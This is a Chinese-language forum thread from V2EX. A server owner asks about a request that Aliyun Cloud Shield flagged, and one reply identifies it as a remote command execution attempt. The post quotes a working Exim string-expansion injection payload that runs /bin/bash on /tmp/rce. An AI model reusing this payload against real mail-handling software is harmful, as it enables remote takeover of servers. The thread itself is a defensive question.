Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
voocel
V2EX  ›  Linux

关于阿里云云盾的攻击访问分析

  •  
  •   voocel ·
    voocel · May 31, 2017 · 3266 views
    This topic created in 3298 days ago, the information mentioned may be changed or developed.

    https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png 阿里云的云盾,这串玩意儿是干啥 target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)

    这里不应该是我服务器的 ip 或者域名吗

    16 replies    2017-06-01 00:21:11 +08:00
    voocel
        1
    voocel  
    OP
       May 31, 2017
    https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png
    voocel
        2
    voocel  
    OP
       May 31, 2017
    ![QQ 截图 20170531135932.png]( https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png)
    voocel
        3
    voocel  
    OP
       May 31, 2017
    <img src="https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png" alt="QQ 截图 20170531135932.png" title="QQ 截图 20170531135932.png" />
    voocel
        4
    voocel  
    OP
       May 31, 2017
    发个图片,真难!
    t333st
        5
    t333st  
       May 31, 2017
    尝试进行远程命令执行,可能攻击者的程序 变量没替换成功就发起了请求
    lisonfan
        6
    lisonfan  
       May 31, 2017
    发帖用 markdown 回帖直接贴链接
    voocel
        7
    voocel  
    OP
       May 31, 2017
    @lisonfan 一楼就是直接贴的链接,并没有显示出来,你看有什么毛病吗
    lisonfan
        8
    lisonfan  
       May 31, 2017
    @voocel #7 一楼显示出来了啊
    voocel
        9
    voocel  
    OP
       May 31, 2017
    @lisonfan 这么神奇,我自己看的的还是一个链接
    laoyur
        10
    laoyur  
       May 31, 2017
    @lisonfan #8 你是不是装什么黑科技插件了,没有显示出来诶
    v2 的正文支持 markdown,回复不支持,但回复支持 url 贴图,不过又仅支持部分 sinaimg 和 imgur ……
    lisonfan
        11
    lisonfan  
       May 31, 2017
    @voocel #9
    @laoyur #10

    lisonfan
        12
    lisonfan  
       May 31, 2017
    但是我用 Chrome 匿名模式也看着是一个链接,难道是 https://chrome.google.com/webstore/detail/v2ex-plus/daeclijmnojoemooblcbfeeceopnkolo 这个插件的功劳?
    Devmingwang
        13
    Devmingwang  
       May 31, 2017 via Android
    @voocel markdown 不会用吗?请问?
    ![]
    ( https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png)
    Devmingwang
        14
    Devmingwang  
       May 31, 2017 via Android
    哦,括号没用英文。。。
    ic3z
        15
    ic3z  
       May 31, 2017 via Android   ❤️ 1
    voocel
        16
    voocel  
    OP
       Jun 1, 2017 via Android
    @ic3z 谢谢,请问我这每天总会有几个恶意 ip,这正常吗
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   3672 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 48ms · UTC 00:43 · PVG 08:43 · LAX 17:43 · JFK 20:43
    ♥ Do have faith in what you're doing.